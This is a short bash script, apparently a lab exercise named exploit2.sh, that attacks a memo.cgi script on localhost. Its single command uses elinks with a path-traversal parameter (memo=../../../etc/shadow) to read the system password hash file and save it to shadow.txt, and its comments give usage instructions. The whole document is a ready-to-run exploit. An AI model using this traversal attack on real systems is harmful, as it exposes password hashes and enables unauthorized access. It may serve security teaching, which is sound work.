#!/bin/bash

# the following line uses a web client to submit a request to
# memo.cgi, resulting in the file being output to shadow.txt

elinks -dump http://localhost/cgi-bin/memo.cgi?memo=../../../etc/shadow > shadow.txt

# there is no 'payload2' required.

# Instructions:
# to use this script just type ./exploit2.sh into the terminal and the password file
# will be requested through the memo.cgi site and saved in a file titled "shadow.txt"
